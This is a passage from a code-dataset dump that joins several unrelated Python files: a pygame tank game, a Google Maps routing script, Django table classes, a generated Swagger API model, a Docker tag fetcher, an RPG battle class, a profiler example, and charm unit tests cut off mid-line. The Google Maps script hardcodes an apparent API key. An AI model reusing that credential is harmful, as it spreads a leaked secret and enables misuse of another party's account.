pygame.font.Font(None, 25)\n\tcad = str(g.ups)\n\ttext_ups = fuente.render(cad, False, NEGRO)\n\tcad = 'SCORE'\n\ttext_score = fuente.render(cad, False, NEGRO)\n\n\t# GAME CYCLE\n\n\twhile flag:\n\n\t\t# Eventos\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tflag = False\n\t\t\tif event.type == pygame.KEYUP:\n\t\t\t\tg.velx = 0\n\t\t\t\tg.vely = 0\n\t\t\t\tg.movement.stop()\n\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\tif event.key == pygame.K_LEFT:\t\n\t\t\t\t\tg.movement.play()\n\t\t\t\t\tg.dir = 1\n\t\t\t\t\tg.velx -= 1\n\t\t\t\t\tg.vely = 0\n\t\t\t\tif event.key == pygame.K_RIGHT:\n\t\t\t\t\tg.movement.play()\t\n\t\t\t\t\tg.dir = 3\n\t\t\t\t\tg.velx += 1\n\t\t\t\t\tg.vely = 0\n\t\t\t\tif event.key == pygame.K_DOWN:\n\t\t\t\t\tg.movement.play()\t\n\t\t\t\t\tg.dir = 2\n\t\t\t\t\tg.vely += 1\n\t\t\t\t\tg.velx = 0\t\t\t\t\t\n\t\t\t\tif event.key == pygame.K_UP:\n\t\t\t\t\tg.movement.play()\t\n\t\t\t\t\tg.dir = 0\n\t\t\t\t\tg.vely -= 1\n\t\t\t\t\tg.velx = 0\n\t\t\t\tif event.key == pygame.K_SPACE:\n\t\t\t\t\tg.shot.play()\n\t\t\t\t\tp = proyectil(proys,[g.rect.x + 10,g.rect.y + 9])\n\t\t\t\t\tproyectiles.add(p)\n\t\t\t\t\tif g.dir == 0:\n\t\t\t\t\t\tp.vely = -4\n\t\t\t\t\tif g.dir == 2:\n\t\t\t\t\t\tp.vely = 4\n\t\t\t\t\tif g.dir == 1:\n\t\t\t\t\t\tp.velx = -4\n\t\t\t\t\tif g.dir == 3:\n\t\t\t\t\t\tp.velx = 4\n\n\t\t# CONTROL\n\n\t\t# LIMITES DEL MAPA\n\n\t\tls_col = pygame.sprite.spritecollide(g, walls, False)\n\t\tfor w in ls_col:\n\t\t\tif (g.rect.right > w.rect.left) and (g.velx > 0):\n\t\t\t\tg.rect.right = w.rect.left\n\t\t\t\tg.velx = 0\n\t\t\tif (g.rect.left < w.rect.right) and (g.velx < 0):\n\t\t\t\tg.rect.left = w.rect.right\n\t\t\t\tg.velx = 0\n\t\t\tif (g.rect.bottom > w.rect.top) and (g.vely > 0):\n\t\t\t\tg.rect.bottom = w.rect.top\n\t\t\t\tg.vely = 0\n\t\t\tif (g.rect.top < w.rect.bottom) and (g.vely < 0):\n\t\t\t\tg.rect.top = w.rect.bottom\n\t\t\t\tg.vely = 0\n\n\t\tif g.rect.x > (ANCHO - g.rect.width - 64):\n\t\t\tg.rect.x = ANCHO - g.rect.width - 64\n\t\t\tg.velx = 0\n\t\tif g.rect.x < 32:\n\t\t\tg.rect.x = 32\n\t\t\tg.velx = 0\n\t\tif g.rect.y > (ALTO - g.rect.height - 16):\n\t\t\tg.rect.y = ALTO - g.rect.height - 16\n\t\t\tg.velx = 0\n\t\tif g.rect.y < 16:\n\t\t\tg.rect.y = 16\n\t\t\tg.vely = 0\n\n\t\t# MOVIMIENTO ENEMIGO\n\n\n\n\t\tfor e in enemies:\n\t\t\tif e.rect.x > (ANCHO - e.rect.width - 64):\n\t\t\t\te.rect.x = ANCHO - e.rect.width - 64\n\t\t\t\te.velx = -2\n\t\t\tif e.rect.x < 32:\n\t\t\t\te.rect.x = 32\n\t\t\t\te.velx = 2\n\t\t\tif e.vely < 0:\n\t\t\t\te.dir = 0\n\t\t\tif e.vely > 0:\n\t\t\t\te.dir = 4\n\t\t\tif e.velx < 0:\n\t\t\t\te.dir = 1\n\t\t\tif e.velx > 0:\n\t\t\t\te.dir = 3\n\t\t\tif e.cad <= 0:\n\t\t\t\tp = proyectil(proys,[e.rect.x + 10,e.rect.y + 9])\n\t\t\t\tproy_enemy.add(p)\n\t\t\t\te.cad = 50\n\t\t\t\tp.vely = 2\n\n\t\t\t\n\t\t# ELIMINACION DE PROYECTILES DEL JUGADOR\n\t\tfor p in proyectiles:\n\t\t\tls_wall = pygame.sprite.spritecollide(p, walls, True)\n\t\t\tls_ene = pygame.sprite.spritecollide(p, enemies, True)\n\t\t\tfor e in ls_ene:\n\t\t\t\tproyectiles.remove(p)\n\t\t\tfor e in ls_wall:\n\t\t\t\tproyectiles.remove(p)\n\t\t\t\t'''m = mod([e.rect.x, e.rect.y])\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tmods.add(m)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tm.vely = 7'''\n\t\t\tif p.rect.x > (ANCHO - p.rect.width - 64):\n\t\t\t\tproyectiles.remove(p)\n\t\t\tif p.rect.x < 32:\n\t\t\t\tproyectiles.remove(p)\n\t\t\tif p.rect.y > (ALTO - p.rect.height - 16):\n\t\t\t\tproyectiles.remove(p)\n\t\t\tif p.rect.y < 16:\n\t\t\t\tproyectiles.remove(p)\n\t\t\n\n\t\tgamers.update()\n\t\tenemies.update()\n\t\twalls.update()\n\t\tproyectiles.update()\n\t\tproy_enemy.update()\n\n\t\t# DISPLAY\n\n\t\tscreen.blit(interfaz, [0,0])\n\t\t#mapping(mi_imag, mapa, ls_mp, 32, 32)\n\t\tscreen.blit(text_ups, [484, 272])\n\t\tscreen.blit(text_score, [452, 10])\n\t\twalls.draw(screen)\n\t\tproyectiles.draw(screen)\n\t\tproy_enemy.draw(screen)\n\t\tgamers.draw(screen)\n\t\tenemies.draw(screen)\n\t\tpygame.display.flip()\n\t\tclock.tick(60)","sub_path":"Computacion grafica/Juegos/Juegos_de_ejemplo/Battle_City_2/BattleCity v 4.0.py","file_name":"BattleCity v 4.0.py","file_ext":"py","file_size_in_byte":8598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"525161074","text":"from datetime import timedelta, datetime\nfrom json import dump\n\nfrom googlemaps import Client\nfrom hjson import load\n\nfrom utils import package_response_to_geojson\n\nwith open('config.hjson') as f:\n config = load(f)\n\nAPI_KEY = 'AIzaSyCuNFYicUlXIeMz-5cCweA15HEJrQ-eut0'\ngmaps_client = Client(API_KEY)\n\nresponse = gmaps_client.directions(\n config['addresses']['Kronshtadt'],\n config['addresses']['Kolpino'],\n mode='driving',\n departure_time=datetime.now() + timedelta(minutes=2)\n)\n\ngeojson_package = package_response_to_geojson(response)\n\nwith open('output/geojson_package.json', 'w') as f:\n dump(geojson_package, f, indent=4, sort_keys=True)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"505802522","text":"import django_tables2 as tables\nfrom .models import Speaker,User\n\nclass SpeakerTable(tables.Table):\n # average = tables.Column(accessor='get_avg')\n\n # def render_average(self,record):\n # return str(record.get_avg)\n #\n # def order_clothing(self, queryset, is_descending):\n # queryset = queryset.annotate(\n # amount=tables.F(\"shirts\") + tables.F(\"pants\")\n # ).order_by((\"-\" if is_descending else \") + \"amount\")\n # return (queryset, True)\n\n class Meta:\n model = Speaker\n template_name = \"django_tables2/bootstrap.html\"\n fields = (\"name\",\"avg\")\n\nclass UserTablePublic(tables.Table):\n ballot_set = tables.ManyToManyColumn()\n class Meta:\n\n model = User\n template_name = \"django_tables2/bootstrap.html\"\n fields = (\"id\",\"name\",'time')\n\nclass UserTable(tables.Table):\n link = tables.LinkColumn('delete_user',text=\"DELETE\",kwargs={\"userid\":tables.A(\"id\")})\n ballot_set = tables.ManyToManyColumn()\n class Meta:\n\n model = User\n template_name = \"django_tables2/bootstrap.html\"\n fields = (\"id\",\"name\",'link','time')\n\n\n# class SpeakerTable(tables.Table):\n# name = tables.Column()\n#\n# class PersonTable(tables.Table):\n# link = tables.LinkColumn('PaperDisplayDetails', kwargs={\"paper_id\": A(\"id\")},\n# class Meta:\n# model = Person\n# template_name = 'django_tables2/bootstrap.html'\n# fields = ('id', 'name', )\n\nclass FinalSpeakerTable(tables.Table):\n # average = tables.Column(accessor='get_avg')\n\n # def render_average(self,record):\n # return str(record.get_avg)\n #\n # def order_clothing(self, queryset, is_descending):\n # queryset = queryset.annotate(\n # amount=tables.F(\"shirts\") + tables.F(\"pants\")\n # ).order_by((\"-\" if is_descending else \") + \"amount\")\n # return (queryset, True)\n\n class Meta:\n model = Speaker\n attrs = {\"text-aligned\": \"center\"}\n template_name = \"django_tables2/bootstrap.html\"\n fields = (\"name\",\"votes\")\n","sub_path":"qipashuo/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"295578314","text":"# coding: utf-8\n\n\"\"\"\n Determined API (Beta)\n\n Determined helps deep learning teams train models more quickly, easily share GPU resources, and effectively collaborate. Determined allows deep learning engineers to focus on building and training models at scale, without needing to worry about DevOps or writing custom code for common tasks like fault tolerance or experiment tracking. You can think of Determined as a platform that bridges the gap between tools like TensorFlow and PyTorch --- which work great for a single researcher with a single GPU --- to the challenges that arise when doing deep learning at scale, as teams, clusters, and data sets all increase in size. # noqa: E501\n\n OpenAPI spec version: 0.1\n Contact: community@determined.ai\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass V1CheckpointWorkload(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'uuid': 'str',\n 'start_time': 'datetime',\n 'end_time': 'datetime',\n 'state': 'Determinedcheckpointv1State',\n 'resources': 'dict(str, str)',\n 'total_batches': 'int'\n }\n\n attribute_map = {\n 'uuid': 'uuid',\n 'start_time': 'startTime',\n 'end_time': 'endTime',\n 'state': 'state',\n 'resources': 'resources',\n 'total_batches': 'totalBatches'\n }\n\n def __init__(self, uuid=None, start_time=None, end_time=None, state=None, resources=None, total_batches=None): # noqa: E501\n \"\"\"V1CheckpointWorkload - a model defined in Swagger\"\"\" # noqa: E501\n\n self._uuid = None\n self._start_time = None\n self._end_time = None\n self._state = None\n self._resources = None\n self._total_batches = None\n self.discriminator = None\n\n if uuid is not None:\n self.uuid = uuid\n self.start_time = start_time\n if end_time is not None:\n self.end_time = end_time\n self.state = state\n if resources is not None:\n self.resources = resources\n self.total_batches = total_batches\n\n @property\n def uuid(self):\n \"\"\"Gets the uuid of this V1CheckpointWorkload. # noqa: E501\n\n UUID of the checkpoint. # noqa: E501\n\n :return: The uuid of this V1CheckpointWorkload. # noqa: E501\n :rtype: str\n \"\"\"\n return self._uuid\n\n @uuid.setter\n def uuid(self, uuid):\n \"\"\"Sets the uuid of this V1CheckpointWorkload.\n\n UUID of the checkpoint. # noqa: E501\n\n :param uuid: The uuid of this V1CheckpointWorkload. # noqa: E501\n :type: str\n \"\"\"\n\n self._uuid = uuid\n\n @property\n def start_time(self):\n \"\"\"Gets the start_time of this V1CheckpointWorkload. # noqa: E501\n\n The time the workload was started. # noqa: E501\n\n :return: The start_time of this V1CheckpointWorkload. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._start_time\n\n @start_time.setter\n def start_time(self, start_time):\n \"\"\"Sets the start_time of this V1CheckpointWorkload.\n\n The time the workload was started. # noqa: E501\n\n :param start_time: The start_time of this V1CheckpointWorkload. # noqa: E501\n :type: datetime\n \"\"\"\n if start_time is None:\n raise ValueError(\"Invalid value for `start_time`, must not be `None`\") # noqa: E501\n\n self._start_time = start_time\n\n @property\n def end_time(self):\n \"\"\"Gets the end_time of this V1CheckpointWorkload. # noqa: E501\n\n The time the workload finished or was stopped. # noqa: E501\n\n :return: The end_time of this V1CheckpointWorkload. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._end_time\n\n @end_time.setter\n def end_time(self, end_time):\n \"\"\"Sets the end_time of this V1CheckpointWorkload.\n\n The time the workload finished or was stopped. # noqa: E501\n\n :param end_time: The end_time of this V1CheckpointWorkload. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._end_time = end_time\n\n @property\n def state(self):\n \"\"\"Gets the state of this V1CheckpointWorkload. # noqa: E501\n\n The state of the checkpoint. # noqa: E501\n\n :return: The state of this V1CheckpointWorkload. # noqa: E501\n :rtype: Determinedcheckpointv1State\n \"\"\"\n return self._state\n\n @state.setter\n def state(self, state):\n \"\"\"Sets the state of this V1CheckpointWorkload.\n\n The state of the checkpoint. # noqa: E501\n\n :param state: The state of this V1CheckpointWorkload. # noqa: E501\n :type: Determinedcheckpointv1State\n \"\"\"\n if state is None:\n raise ValueError(\"Invalid value for `state`, must not be `None`\") # noqa: E501\n\n self._state = state\n\n @property\n def resources(self):\n \"\"\"Gets the resources of this V1CheckpointWorkload. # noqa: E501\n\n Dictionary of file paths to file sizes in bytes of all files in the checkpoint. # noqa: E501\n\n :return: The resources of this V1CheckpointWorkload. # noqa: E501\n :rtype: dict(str, str)\n \"\"\"\n return self._resources\n\n @resources.setter\n def resources(self, resources):\n \"\"\"Sets the resources of this V1CheckpointWorkload.\n\n Dictionary of file paths to file sizes in bytes of all files in the checkpoint. # noqa: E501\n\n :param resources: The resources of this V1CheckpointWorkload. # noqa: E501\n :type: dict(str, str)\n \"\"\"\n\n self._resources = resources\n\n @property\n def total_batches(self):\n \"\"\"Gets the total_batches of this V1CheckpointWorkload. # noqa: E501\n\n Total number of batches as of this workload's completion. # noqa: E501\n\n :return: The total_batches of this V1CheckpointWorkload. # noqa: E501\n :rtype: int\n \"\"\"\n return self._total_batches\n\n @total_batches.setter\n def total_batches(self, total_batches):\n \"\"\"Sets the total_batches of this V1CheckpointWorkload.\n\n Total number of batches as of this workload's completion. # noqa: E501\n\n :param total_batches: The total_batches of this V1CheckpointWorkload. # noqa: E501\n :type: int\n \"\"\"\n if total_batches is None:\n raise ValueError(\"Invalid value for `total_batches`, must not be `None`\") # noqa: E501\n\n self._total_batches = total_batches\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(V1CheckpointWorkload, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, V1CheckpointWorkload):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"harness/determined/_swagger/client/models/v1_checkpoint_workload.py","file_name":"v1_checkpoint_workload.py","file_ext":"py","file_size_in_byte":8405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"122754606","text":"import requests\nimport json\n\nmilvus_dev = \"https://registry.hub.docker.com/v2/repositories/milvusdb/milvus-dev/tags?ordering=last_updated\"\nmilvus = \"https://registry.hub.docker.com/v2/repositories/milvusdb/milvus/tags?ordering=last_updated\"\n\n\ndef get_tag(url):\n payload = {}\n headers = {}\n\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n\n res = response.json()[\"results\"]\n tags = [r[\"name\"] for r in res]\n return tags\n\n\nlatest_tag = \"master-latest\"\nlatest_rc_tag = [tag for tag in sorted(get_tag(milvus)) if \"rc\" and \"v\" in tag][-1]\nrelease_version = \"-\".join(latest_rc_tag.split(\"-\")[:-2])\nprint(release_version)\nprint(latest_tag, latest_rc_tag)\n\ndata = {\n \"latest_tag\": latest_tag,\n \"latest_rc_tag\": latest_rc_tag[1:],\n \"release_version\": release_version\n}\nprint(data)\nwith open(\"tag_info.json\", \"w\") as f:\n f.write(json.dumps(data))\n","sub_path":"tests/python_client/deploy/scripts/get_tag.py","file_name":"get_tag.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"355882866","text":"import random\nfrom .magic import Spell\nfrom .inventory import Item\n\n\n# Χρώματα για διάφορες ενέργειες\nclass Colors:\n header = '\\033[95m'\n blue = '\\033[94m'\n green = '\\033[92m'\n warning = '\\033[93m'\n fail = '\\033[91m'\n end_color = '\\033[0m'\n bold = '\\033[1m'\n underline = '\\033[4m'\n\n\n# Δημιουργούμε κλάση ανθρώπου και φτιάχνουμε πόντους ζωής , πόντους μαγείας , επίθεση, άμυνα, μαγεία και ενέργειες για επίθεση και άμυνα\nclass Person:\n def __init__(self, name, hp, mp, atk, df, magic, items):\n self.name = name\n self.max_hp = hp\n self.hp = hp\n self.max_mp = mp\n self.mp = mp\n self.atk_low = atk - 10\n self.atk_high = atk + 10\n self.df = df\n self.magic = magic\n self.items = items\n self.actions = [\"Απλή Επίθεση\", \"Μαγεία\", \"Αντικείμενα\"]\n\n # Δημιουργούμε μέθοδο για την επίθεση\n def generate_damage(self):\n return random.randrange(self.atk_low, self.atk_high)\n\n # Δημιουργούμε μέθοδο για το dmg που τρώει είτε ο παίχτης είτε ο αντίπαλοσ\n def take_damage(self, dmg):\n self.hp -= dmg\n if self.hp < 0:\n self.hp = 0\n return self.hp\n\n # Μέθοδος για να healαρεις\n def heal(self, dmg):\n self.hp += dmg\n if self.hp > self.max_hp:\n self.hp = self.max_hp\n\n # Μέθοδος για να μας επιστρέφει τους πόντους ζωής\n def get_hp(self):\n return self.hp\n\n # Μέθοδος για να μας επιστρέφει τους μέγιστους πόντους ζωής\n def get_max_hp(self):\n return self.max_hp\n\n # Μέθοδος για να μας επιστρέφει τους πόντους μαγείας\n def get_mp(self):\n return self.mp\n\n # Μέθοδος για να μας επιστρέφει τους μέγιστους πόντους μαγείας\n def get_max_mp(self):\n return self.max_mp\n\n # Μέθοδος που μειώνει τους πόντους μαγείας με το κόστος του spell\n def reduce_mp(self, cost):\n self.mp -= cost\n\n # Μέθοδος για να διαλέξουμε ενέργεια από τη λίστα\n def choose_action(self):\n i = 1\n print(\"\\n\" + \" \" + Colors.bold + self.name + Colors.end_color)\n print(Colors.blue + Colors.bold + \" ΕΝΕΡΓΕΙΕΣ:\" + Colors.end_color)\n for item in self.actions:\n print(\" \" + str(i) + \".\", item)\n i += 1\n\n # Μέθοδος για να διαλέξουμε spell από τη λίστα\n def choose_magic(self):\n i = 1\n print(\"\\n\" + \" \" + Colors.blue + Colors.bold + \" ΞΟΡΚΙΑ:\" + Colors.end_color)\n for spell in self.magic:\n print(\" \" + str(i) + \".\", spell.name, \"(κόστος:\", str(spell.cost) + \")\")\n i += 1\n\n # Μέθοδος για να διαλέξουμε αντικείμενα από τη λίστα\n def choose_item(self):\n i = 1\n print(\"\\n\" + \" \" + Colors.green + Colors.bold + \" ΑΝΤΙΚΕΙΜΕΝΑ:\" + Colors.end_color)\n for item in self.items:\n print(\" \" + str(i) + \".\", item[\"item\"].name + \":\", item[\"item\"].description,\n \"(x\" + str(item[\"quantity\"]) + \")\")\n i += 1\n\n # Μέθοδος για να επιλέξουμε σε ποιον αντίπαλο θα επιτεθούμε\n def choose_target(self, enemies):\n i = 1\n\n print(\"\\n\" + Colors.fail + Colors.bold + \" ΕΧΘΡΟΣ:\" + Colors.end_color)\n for enemy in enemies:\n if enemy.get_hp() != 0:\n print(\" \" + str(i) + \".\", enemy.name)\n i += 1\n choice = int(input(\" Επιλέξτε αντίπαλο: \")) - 1\n return choice\n\n # Μέθοδος για να παίρνει τα στατιστικά του αντιπάλου\n def get_enemy_stats(self):\n hp_bar = \"\"\n bar_ticks = (self.hp / self.max_hp) * 100 / 2\n\n while bar_ticks > 0:\n hp_bar += \"█\"\n bar_ticks -= 1\n\n while len(hp_bar) < 50:\n hp_bar += \" \"\n\n hp_string = str(self.hp) + \"/\" + str(self.max_hp)\n current_hp = \"\"\n\n if len(hp_string) < 9:\n decreased = 11 - len(hp_string)\n\n while decreased > 0:\n current_hp += \" \"\n decreased -= 1\n\n current_hp += hp_string\n else:\n current_hp = hp_string\n\n print(Colors.bold + self.name + \" \" + current_hp + \" \" + Colors.fail + hp_bar + Colors.end_color)\n\n # Μέθοδος για τα στατιστικά των παιχτών (ζωή και μαγεία)\n # Χωρίζει την μπάρα σε τμήματα και καθε φορά ανάλογα με την αυξομείωση ζωής αλλάζει είτε προσθέτοντας είτε αφαιρώντας τα κουτιά (ASCI code 219)\n def get_stats(self):\n hp_bar = \"\"\n bar_ticks = (self.hp / self.max_hp) * 100 / 4\n\n mp_bar = \"\"\n mp_ticks = (self.mp / self.max_mp) * 100 / 10\n\n while bar_ticks > 0:\n hp_bar += \"█\"\n bar_ticks -= 1\n\n while len(hp_bar) < 25:\n hp_bar += \" \"\n\n while mp_ticks > 0:\n mp_bar += \"█\"\n mp_ticks -= 1\n\n while len(mp_bar) < 10:\n mp_bar += \" \"\n hp_string = str(self.hp) + \"/\" + str(self.max_hp)\n current_hp = \"\"\n\n if len(hp_string) < 9:\n decreased = 9 - len(hp_string)\n\n while decreased > 0:\n current_hp += \" \"\n decreased -= 1\n\n current_hp += hp_string\n else:\n current_hp = hp_string\n\n mp_string = str(self.mp) + \"/\" + str(self.max_mp)\n current_mp = \"\"\n\n if len(mp_string) < 7:\n decreased = 7 - len(mp_string)\n while decreased > 0:\n current_mp += \" \"\n decreased -= 1\n\n current_mp += mp_string\n\n else:\n current_mp = mp_string\n\n print(Colors.bold + self.name + \" \" +\n current_hp + Colors.green + \" \" + hp_bar + Colors.end_color + \" \" + Colors.bold +\n current_mp + Colors.blue + \" \" + mp_bar + Colors.end_color)\n\n # Μέθοδος για το πως θα επιλέγει ο αντίπαλος spells\n\n def choose_enemy_spell(self):\n magic_choice = random.randrange(0, len(self.magic))\n spell = self.magic[magic_choice]\n magic_dmg = spell.generate_damage()\n\n pct = self.hp / self.max_hp * 100\n\n if self.mp < spell.cost or spell.type == \"white\" and pct > 50:\n self.choose_enemy_spell()\n return spell, magic_dmg\n else:\n return spell, magic_dmg\n","sub_path":"battle/classes/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":7179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"530381574","text":"\"\"\"\nThe numbers will vary slightly but you should be able to get a fair estimate of the bias using this code. If the numbers still vary a lot, you can increase the trials from 100000 to something even larger. This type of calibration only works for the profile module, but if you are looking for more accurate results and the cProfile module does not work for you due to inheritance or not being supported on your platform, you can use this code to set your bias globally and get more accurate results\n\"\"\"\n\nimport sys\nimport functools\nimport pstats\nimport profile\n\n\n@functools.lru_cache()\ndef fibonacci_cached(n):\n if n < 2:\n return n\n else:\n return fibonacci_cached(n - 1) + fibonacci_cached(n - 2)\n\n\ndef fibonacci(n):\n if n < 2:\n return n\n else:\n return fibonacci(n - 1) + fibonacci(n - 2)\n\n\nif __name__ == '__main__':\n # first calculate the bias system has\n if sys.argv[-2] == 'True':\n profiler = profile.Profile()\n for i in range(10):\n print(profiler.calibrate(100000))\n else:\n profiler = profile.Profile(bias=1.213882501176391e-06) # this bias has been taken from upper run\n n = 30\n\n if sys.argv[-1] == 'cache':\n profiler.runcall(fibonacci_cached, n)\n else:\n profiler.runcall(fibonacci, n)\n\n stats = pstats.Stats(profiler).sort_stats('calls')\n stats.print_stats()\n\n# Terminal python 03_calibration.py False no_cache\n\n","sub_path":"Codes/Chapter_12_Performance/03_calibration.py","file_name":"03_calibration.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"223772512","text":"import mock\nimport unittest\nimport trilio_data_mover as datamover\n\n_when_args = {}\n_when_not_args = {}\n\n\ndef mock_hook_factory(d):\n\n def mock_hook(*args, **kwargs):\n\n def inner(f):\n # remember what we were passed. Note that we can't actually\n # determine the class we're attached to, as the decorator only gets\n # the function.\n try:\n d[f.__name__].append(dict(args=args, kwargs=kwargs))\n except KeyError:\n d[f.__name__] = [dict(args=args, kwargs=kwargs)]\n return f\n return inner\n return mock_hook\n\n\nclass Test(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls._patched_when = mock.patch('charms.reactive.when',\n mock_hook_factory(_when_args))\n cls._patched_when_started = cls._patched_when.start()\n cls._patched_when_not = mock.patch('charms.reactive.when_not',\n mock_hook_factory(_when_not_args))\n cls._patched_when_not_started = cls._patched_when_not.start()\n # force requires to rerun the mock_hook decorator:\n # try except is Python2/Python3 compatibility as Python3 has moved\n # reload to importlib.\n try:\n reload(datamover)\n except NameError:\n import importlib\n importlib.reload(datamover)\n\n @classmethod\n def tearDownClass(cls):\n cls._patched_when.stop()\n cls._patched_when_started = None\n cls._patched_when = None\n cls._patched_when_not.stop()\n cls._patched_when_not_started = None\n cls._patched_when_not = None\n # and fix any breakage we did to the module\n try:\n reload(datamover)\n except NameError:\n import importlib\n importlib.reload(datamover)\n\n def setUp(self):\n self._patches = {}\n self._patches_start = {}\n\n def tearDown(self):\n for k, v in self._patches.items():\n v.stop()\n setattr(self, k, None)\n self._patches = None\n self._patches_start = None\n\n def patch(self, obj, attr, return_value=None, side_effect=None):\n mocked = mock.patch.object(obj, attr)\n self._patches[attr] = mocked\n started = mocked.start()\n started.return_value = return_value\n started.side_effect = side_effect\n self._patches_start[attr] = started\n setattr(self, attr, started)\n\n def test_registered_hooks(self):\n # test that the hooks actually registered the relation expressions that\n # are meaningful for this interface: this is to handle regressions.\n # The keys are the function names that the hook attaches to.\n when_patterns = {\n 'stop_tvault_contego_plugin': ('tvault-contego.stopping', ),\n }\n when_not_patterns = {\n 'install_tvault_contego_plugin': (\n 'tvault-contego.installed', ), }\n # check the when hooks are attached to the expected functions\n for t, p in [(_when_args, when_patterns),\n (_when_not_args, when_not_patterns)]:\n for f, args in t.items():\n # check that function is in patterns\n self.assertTrue(f in p.keys(),\n \"{} not found\".format(f))\n # check that the lists are equal\n lists = []\n for a in args:\n lists += a['args'][:]\n self.assertEqual(sorted(lists), sorted(p[f]),\n \"{}: incorrect state registration\".format(f))\n\n def test_install_plugin(self):\n self.patch(datamover, 'install_plugin')\n datamover.install_plugin('pkg_name')\n self.install_plugin.assert_called_once_with('pkg_name')\n\n def test_uninstall_plugin(self):\n self.patch(datamover, 'uninstall_plugin')\n datamover.uninstall_plugin()\n self.uninstall_plugin.assert_called_once_with()\n\n def test_install_tvault_contego_plugin(self):\n self.patch(datamover, 'install_tvault_contego_plugin')\n datamover.install_tvault_contego_plugin()\n self.install_tvault_contego_plugin.assert_called_once_with()\n\n def test_stop_tvault_contego_plugin(self):\n self.patch(datamover, 'config')\n self.patch(datamover, 'status_set')\n self.patch(datamover, 'remove_state')\n self.patch(datamover, 'uninstall_plugin')\n self.uninstall_plugin.return_value = True\n datamover.stop_tvault_contego_plugin()\n self.status_set.assert_called_with(\n 'maintenance', 'Stopping...')\n self.remove_state.assert_called_with('tvault-contego.stopping')\n\n def test_s3_object_storage_fail(self):\n self.patch(datamover, 'config')\n self.config.return_value = 's3'\n self.patch(datamover, 'apt_update')\n self.patch(datamover, 'status_set')\n self.patch(datamover, 'validate_backup')\n self.validate_backup.return_value = True\n self.patch(datamover, 'add_users')\n self.add_users.return_value = True\n self.patch(datamover, 'create_virt_env')\n self.create_virt_env.return_value = True\n self.patch(datamover, 'ensure_files')\n self.ensure_files.return_value = True\n self.patch(datamover, 'create_conf')\n self.create_conf.return_value = True\n self.patch(datamover, 'ensure_data_dir')\n self.ensure_data_dir.return_value = True\n self.patch(datamover, 'create_service_file')\n self.create_service_file.return_value = True\n self.patch(datamover, 'create_object_storage_service')\n self.create_object_storage_service.return_value = False\n self.patch(datamover.os, 'system')\n self.patch(datamover, 'log')\n datamover.install_tvault_contego_plugin()\n self.status_set.assert_called_with(\n 'blocked',\n 'Failed while creating ObjectStore service file')\n\n def test_s3_object_storage_pass(self):\n self.patch(datamover, 'config')\n self.patch(datamover, 'apt_update')\n self.patch(datamover, 'status_set')\n self.patch(datamover, 'validate_backup')\n self.validate_backup.return_value = True\n self.patch(datamover, 'add_users')\n self.add_users.return_value = True\n self.patch(datamover, 'create_virt_env')\n self.create_virt_env.return_value = True\n self.patch(datamover, 'ensure_files')\n self.ensure_files.return_value = True\n self.patch(datamover, 'create_conf')\n self.create_conf.return_value = True\n self.patch(datamover, 'ensure_data_dir')\n self.ensure_data_dir.return_value = True\n self.patch(datamover, 'create_service_file')\n self.create_service_file.return_value = True\n self.patch(datamover, 'create_object_storage_service')\n self.create_object_storage_service.return_value = True\n self.patch(datamover, 'service_restart')\n self.patch(datamover, 'set_flag')\n self.patch(datamover, 'application_version_set')\n self.patch(datamover, 'get_new_version')\n self.patch(datamover.os, 'system')\n datamover.install_tvault_contego_plugin()\n self.service_restart.assert_called_with(\n 'tvault-contego')\n self.status_set.assert_called_with(\n 'active', 'Ready...')\n self.application_version_set.assert_called_once()\n self.set_flag.assert_called_with(\n 